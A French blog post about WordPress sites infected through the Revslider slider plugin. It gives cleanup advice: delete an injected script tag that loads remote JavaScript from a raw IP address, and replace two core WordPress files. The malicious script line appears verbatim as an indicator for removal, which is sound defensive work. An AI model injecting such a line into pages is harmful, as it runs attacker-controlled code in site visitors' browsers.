11 000 sites blacklistés par Google 100 000 sites touchés … c’est un bon malware bien efficace!!!
Je dois dire que je maudis régulièrement les sliders… il y a quelques temps c’était Nextgen qui avait supprimé un paquet de fonctions dans une mise à jour… mais là revslider fait nettement mieux… très puissant, très compliqué à mettre en œuvre, très responsive.
Ce slider truffe votre site en quelques minutes de ces codes malicieux… heureusement ils sont assez faciles à repérer (mais nombreux)… mais surtout le problème c’est que le ver est dans le fruit et pas si facile de l’enlever: si vous avez mis le slider tout seul pas de problème une mise à jour WordPress et une mise à jour de l’extension et le problème est définitivement résolu… par contre s’il se trouve dans un theme (themepunch) il ne se met à jour qu’avec le thème!!! donc danger !!!
Bilan: 3 sites explosés et 3 sites sont passés à coté la version était trop anciennement…
Pour l’enlever rechercher ce script:
<script type= »text/javascript » src= »http://122.155.168.105/ads/inpage/pub/collect.js »></script>
et l’enlever bien sur du thème, des plugins et de WordPress… il y en a partout et le script colle ce code juste avant la balise </head>, donc des qu’il trouve </head> dans l’arborescence il colle son code dedans!!! et chercher bien il va en profondeur…
De plus il faut remplacer dans le wp-include de WordPress les fichiers swfobject.js et template-loader.php.
Cette actualité va relancer le fameux débat de la mise à jour des thèmes… qui n’est toujours pas automatique sur les sites payants comme ThemeForest… On boycotte? impossible nos clients aiment trop ces thèmes…
Pas de commentaire